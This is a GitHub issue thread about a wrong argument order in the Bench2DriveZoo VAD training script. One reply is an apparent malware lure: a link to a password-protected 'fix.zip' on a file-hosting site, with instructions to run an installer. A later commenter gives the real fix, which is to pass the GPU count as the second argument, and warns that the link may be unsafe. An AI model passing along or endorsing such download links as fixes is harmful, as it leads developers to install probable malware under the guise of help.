### ISSUE TITLE
bug when running ./adzoo/vad/dist_train.sh

### ISSUE THREAD

**Issue by starlighttt123** [Thinklab-SJTU/Bench2DriveZoo#32]
when running` ./adzoo/vad/dist_train.sh ./adzoo/vad/configs/VAD/VAD_base_e2e_b2d.py ./ckpts/vad_b2d_base.pth 1`

It occurs:
ValueError: Unsupported nproc_per_node value: ./ckpts/vad_b2d_base.pth

It seems to be the problem of `GPUS=$2` in dist_train.sh

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jayyoung0802** [comment]
@starlighttt123  Use ./adzoo/vad/dist_train.sh ./adzoo/vad/configs/VAD/VAD_base_e2e_b2d.py 1.
Not sure @pngjian link is safe, please be aware.
